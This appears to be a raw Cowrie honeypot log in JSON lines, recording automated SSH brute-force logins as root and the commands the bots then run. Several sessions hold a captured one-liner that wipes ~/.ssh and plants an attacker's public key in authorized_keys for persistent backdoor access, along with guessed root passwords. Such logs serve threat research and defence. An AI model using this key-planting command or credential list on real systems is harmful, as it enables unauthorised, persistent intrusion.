{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:18:17.644800Z","src_ip":"27.112.78.245","session":"76617779a7b9"}
{"eventid":"cowrie.session.connect","src_ip":"51.158.120.121","src_port":37620,"dst_ip":"1.2.3.4","dst_port":22,"session":"b94f4ad6e10f","protocol":"ssh","message":"New connection: 51.158.120.121:37620 (1.2.3.4:22) [session: b94f4ad6e10f]","sensor":"my-vps","timestamp":"2025-08-26T00:18:23.177441Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:18:23.178153Z","src_ip":"51.158.120.121","session":"b94f4ad6e10f"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T00:18:23.202251Z","src_ip":"51.158.120.121","session":"b94f4ad6e10f"}
{"eventid":"cowrie.login.success","username":"root","password":"rootadmin@123","message":"login attempt [root/rootadmin@123] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:18:23.337618Z","src_ip":"51.158.120.121","session":"b94f4ad6e10f"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T00:18:23.409512Z","src_ip":"51.158.120.121","session":"b94f4ad6e10f"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T00:18:23.410263Z","src_ip":"51.158.120.121","session":"b94f4ad6e10f"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T00:18:23.411205Z","src_ip":"51.158.120.121","session":"b94f4ad6e10f"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:18:23.435984Z","src_ip":"51.158.120.121","session":"b94f4ad6e10f"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T00:18:23.589076Z","src_ip":"51.158.120.121","session":"b94f4ad6e10f"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-26T00:18:23.589750Z","src_ip":"51.158.120.121","session":"b94f4ad6e10f"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-26T00:18:23.615970Z","src_ip":"51.158.120.121","session":"b94f4ad6e10f"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:18:23.617151Z","src_ip":"51.158.120.121","session":"b94f4ad6e10f"}
{"eventid":"cowrie.session.connect","src_ip":"51.158.120.121","src_port":37628,"dst_ip":"1.2.3.4","dst_port":22,"session":"06ed7ccf96c3","protocol":"ssh","message":"New connection: 51.158.120.121:37628 (1.2.3.4:22) [session: 06ed7ccf96c3]","sensor":"my-vps","timestamp":"2025-08-26T00:18:23.639117Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:18:23.639943Z","src_ip":"51.158.120.121","session":"06ed7ccf96c3"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T00:18:23.663670Z","src_ip":"51.158.120.121","session":"06ed7ccf96c3"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-26T00:18:23.802113Z","src_ip":"51.158.120.121","session":"06ed7ccf96c3"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:18:24.829036Z","src_ip":"51.158.120.121","session":"06ed7ccf96c3"}
{"eventid":"cowrie.session.connect","src_ip":"51.158.120.121","src_port":37638,"dst_ip":"1.2.3.4","dst_port":22,"session":"9cd740ffe03c","protocol":"ssh","message":"New connection: 51.158.120.121:37638 (1.2.3.4:22) [session: 9cd740ffe03c]","sensor":"my-vps","timestamp":"2025-08-26T00:18:24.852239Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:18:24.852834Z","src_ip":"51.158.120.121","session":"9cd740ffe03c"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T00:18:24.876899Z","src_ip":"51.158.120.121","session":"9cd740ffe03c"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:18:25.013175Z","src_ip":"51.158.120.121","session":"9cd740ffe03c"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:18:25.038832Z","src_ip":"51.158.120.121","session":"b94f4ad6e10f"}
{"eventid":"cowrie.session.closed","duration":"0.2","message":"Connection lost after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:18:25.039626Z","src_ip":"51.158.120.121","session":"9cd740ffe03c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":47315,"dst_ip":"1.2.3.4","dst_port":23,"session":"130651e16259","protocol":"telnet","message":"New connection: 212.227.235.229:47315 (1.2.3.4:23) [session: 130651e16259]","sensor":"my-vps","timestamp":"2025-08-26T00:18:59.798269Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":33536,"dst_ip":"1.2.3.4","dst_port":22,"session":"6cdd21c1b947","protocol":"ssh","message":"New connection: 212.227.235.229:33536 (1.2.3.4:22) [session: 6cdd21c1b947]","sensor":"my-vps","timestamp":"2025-08-26T00:19:00.924801Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T00:19:00.925667Z","src_ip":"212.227.235.229","session":"6cdd21c1b947"}
{"eventid":"cowrie.client.kex","hassh":"4e066189c3bbeec38c99b1855113733a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 4e066189c3bbeec38c99b1855113733a","sensor":"my-vps","timestamp":"2025-08-26T00:19:01.198981Z","src_ip":"212.227.235.229","session":"6cdd21c1b947"}
{"eventid":"cowrie.login.success","username":"root","password":"kjashd123sadhj123d1SS","message":"login attempt [root/kjashd123sadhj123d1SS] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:19:01.909149Z","src_ip":"212.227.235.229","session":"6cdd21c1b947"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:19:02.222578Z","src_ip":"212.227.235.229","session":"6cdd21c1b947"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":47370,"dst_ip":"1.2.3.4","dst_port":23,"session":"8c1b0c80316e","protocol":"telnet","message":"New connection: 212.227.235.229:47370 (1.2.3.4:23) [session: 8c1b0c80316e]","sensor":"my-vps","timestamp":"2025-08-26T00:19:07.816260Z"}
{"eventid":"cowrie.session.closed","duration":30.603110313415527,"message":"Connection lost after 30 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:19:30.401300Z","src_ip":"212.227.235.229","session":"130651e16259"}
{"eventid":"cowrie.session.connect","src_ip":"27.112.78.245","src_port":35200,"dst_ip":"1.2.3.4","dst_port":22,"session":"38519233ed90","protocol":"ssh","message":"New connection: 27.112.78.245:35200 (1.2.3.4:22) [session: 38519233ed90]","sensor":"my-vps","timestamp":"2025-08-26T00:19:37.730692Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:19:37.731675Z","src_ip":"27.112.78.245","session":"38519233ed90"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T00:19:38.004083Z","src_ip":"27.112.78.245","session":"38519233ed90"}
{"eventid":"cowrie.session.closed","duration":30.563286304473877,"message":"Connection lost after 30 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:19:38.379451Z","src_ip":"212.227.235.229","session":"8c1b0c80316e"}
{"eventid":"cowrie.login.success","username":"root","password":"9876","message":"login attempt [root/9876] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:19:39.211340Z","src_ip":"27.112.78.245","session":"38519233ed90"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T00:19:39.813173Z","src_ip":"27.112.78.245","session":"38519233ed90"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T00:19:39.813838Z","src_ip":"27.112.78.245","session":"38519233ed90"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T00:19:39.814793Z","src_ip":"27.112.78.245","session":"38519233ed90"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:19:40.089583Z","src_ip":"27.112.78.245","session":"38519233ed90"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T00:19:40.663360Z","src_ip":"27.112.78.245","session":"38519233ed90"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-26T00:19:40.664046Z","src_ip":"27.112.78.245","session":"38519233ed90"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-26T00:19:40.939793Z","src_ip":"27.112.78.245","session":"38519233ed90"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:19:40.940765Z","src_ip":"27.112.78.245","session":"38519233ed90"}
{"eventid":"cowrie.session.connect","src_ip":"27.112.78.245","src_port":35214,"dst_ip":"1.2.3.4","dst_port":22,"session":"41c31bbdd60c","protocol":"ssh","message":"New connection: 27.112.78.245:35214 (1.2.3.4:22) [session: 41c31bbdd60c]","sensor":"my-vps","timestamp":"2025-08-26T00:19:41.210866Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:19:41.211727Z","src_ip":"27.112.78.245","session":"41c31bbdd60c"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T00:19:42.544121Z","src_ip":"27.112.78.245","session":"41c31bbdd60c"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-26T00:19:43.614812Z","src_ip":"27.112.78.245","session":"41c31bbdd60c"}
{"eventid":"cowrie.session.closed","duration":"3.9","message":"Connection lost after 3.9 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:19:45.098465Z","src_ip":"27.112.78.245","session":"41c31bbdd60c"}
{"eventid":"cowrie.session.connect","src_ip":"27.112.78.245","src_port":52598,"dst_ip":"1.2.3.4","dst_port":22,"session":"be58541e7dfe","protocol":"ssh","message":"New connection: 27.112.78.245:52598 (1.2.3.4:22) [session: be58541e7dfe]","sensor":"my-vps","timestamp":"2025-08-26T00:19:45.370903Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:19:45.371757Z","src_ip":"27.112.78.245","session":"be58541e7dfe"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T00:19:45.640126Z","src_ip":"27.112.78.245","session":"be58541e7dfe"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:19:46.754025Z","src_ip":"27.112.78.245","session":"be58541e7dfe"}
